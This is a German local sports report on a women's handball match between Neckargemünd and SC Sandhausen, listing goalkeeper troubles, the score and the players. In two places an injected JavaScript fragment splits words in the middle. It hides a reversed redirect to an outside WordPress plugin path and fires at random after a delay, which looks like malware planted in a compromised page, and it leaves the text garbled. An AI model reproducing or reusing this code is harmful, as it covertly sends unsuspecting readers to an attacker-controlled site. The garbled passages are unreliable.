Damen in Sandhausen: gut gekämpft

Am Sonntag den 29. Oktoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}tober reiste eine lückenhafte Neckargemünder Damenmannschaft mit Trainerin Stephanie Knebel beim SC Sandhausen an. Leider mussten die Damen krankheitsbedingt auf Torfrau und weitere Spielerinnen verzichten. Eine stark angeschlagene Elaine Weitzel stellte sich der Herausforderung das eigene Tor zu verteidigen. In der 1. Halbzeit konnten sich die Damen nur mühsam ins Spiel hineinfinden. Aufgrund einigen Fehlpässen und schlechten Absprachen in der Abwehr erzielten die Neckargemünder Damen lediglich 4 Tore. Jedoch sah es auf der gegnerischen Seite mit 9 Toren nicht gerade besser aus.
Die Pause nutzen die Neckargemünder um neue Kraft zu sammeln damit die Konzentration in der letzte Halbzeit besser stimmte. Leider mussten die Damen zu Anfang der zweiten Halbzeit auf ihre Ersatztoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}torfrau verzichten und Marcella Mann erklärte sich bereit, sich für die Mannschaft ins Tor zu stellen.
Trotz Feldspielerin im Tor und einer kräftezehrenden ersten Halbzeit ohne große Auswechselmöglichkeiten erkämpften sich die Damen durch bessere Abwehrarbeit und sicheren Pässen ein Endergebnis von 17:15.
Leider konnten die Damen ihr Durchhaltevermögen und ihre kämpferische Leistung nicht mit Punkten belohnen.
Man erhofft sich beim nächsten Spiel am 12. November um 15:45 Uhr in Walldorf mit einer besser besetzen Mannschaft erfolgreicher abzuschließen.
Es spielten: Weitzel (im Tor), Mann (im Tor), Görg (1), Ebert (1), Brenner, Gerstner (3/1), Hangel, Capriglione (1), Buchner (9)